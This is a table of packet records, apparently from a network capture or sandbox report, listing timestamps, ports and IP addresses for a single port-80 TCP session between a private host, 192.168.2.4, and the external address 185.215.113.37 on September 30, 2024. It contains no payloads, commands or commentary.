Sep 30, 2024 07:08:07.797310114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797323942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797324896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797343969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797358036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797360897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797378063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797391891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797411919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797439098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797473907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797489882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797502041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797517061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797518015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797533989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797534943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797548056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.797549963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797564983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.797588110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881052017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881084919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881102085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881124973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881128073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881141901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881153107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881153107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881159067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881171942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881175995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881191969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881194115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881203890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881207943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881220102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881225109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881239891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881241083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881252050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881257057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881270885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881273985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881290913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881304979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881314039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881427050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881439924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881453991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881468058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881472111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881484985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881505013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881505966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881515980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881520987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881546021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881546974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881561995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881561995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881578922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881587982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881603003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881606102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881613970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881639004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881645918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881655931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881680012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881685019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881699085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881700993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881715059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881730080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881731987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881742954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881747961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881762028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881778002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881786108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881788015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881803036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881835938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881843090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881844044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881859064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881874084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881886959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881890059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881906986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881920099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881939888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.881942987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881958008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881973028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881985903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.881987095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882005930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882023096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882041931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882056952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882071018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882102013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882103920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882117987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882119894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882143021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882148981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882158041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882165909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882173061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882186890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882188082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882204056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882241964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882241964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882251978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882257938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882272959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882287025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882302999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882308960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882327080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882342100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882355928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882369995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882385969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882397890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882425070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882437944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882452011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882462978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882467985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882479906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882484913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882503033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882513046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882524014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882539034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882554054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882569075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882580996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882586002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882601023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882603884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882611990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882620096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882632017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882654905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882654905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882688999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882703066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882716894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882730007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882731915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882745981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882747889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882761002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882781029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882788897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882807970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882822990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882838011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882850885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882853031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882874966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882894993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.882949114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882963896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882987022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.882992983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883002996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883014917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883019924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883025885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883035898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883044958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883050919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883061886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883069992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883076906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883094072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883104086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883150101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883163929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883178949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883191109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883193970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883208036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883210897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883227110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883228064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883244991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883251905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883275986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883330107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883346081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883362055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883373976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883374929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883398056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883398056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883400917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883414984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883419037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883435011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883445978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883462906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883480072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883481979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883496046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883510113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883519888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883524895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883537054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883553982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883579969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883618116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883630991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883644104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883661032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883670092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883677959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883686066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883696079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883701086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883714914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883718967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883724928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883734941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883748055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883749962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883760929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883768082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883783102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883783102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883791924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883800030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883816004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883821964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883832932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883852005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883904934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883922100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883949041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883964062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.883965015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.883981943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884007931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884018898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884071112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884087086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884100914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884113073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884118080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884134054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884156942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884156942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884196043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884211063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884224892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884237051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884238958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884252071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884254932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884260893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884268999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884284019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884284973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884296894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884303093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884320021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884322882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.884332895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884351969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.884365082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.967864990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.967902899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.967930079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.967945099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.967956066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.967962980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.967979908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.967986107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968005896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968017101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968022108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968041897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968066931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968070030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968107939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968111038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968122005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968152046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968172073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968172073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968189955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968205929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968219995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968220949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968240976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968254089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968259096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968275070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968275070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968292952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968302011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968321085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968327999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968342066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968343973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968360901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968373060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968393087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968399048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968408108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968416929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968432903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968446016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968446016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968461990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968478918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968501091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968538046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968554974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968570948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968586922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968590975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968600988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.968604088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968625069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.968628883 CEST	49730	80	192.168.2.4	185.215.113.37
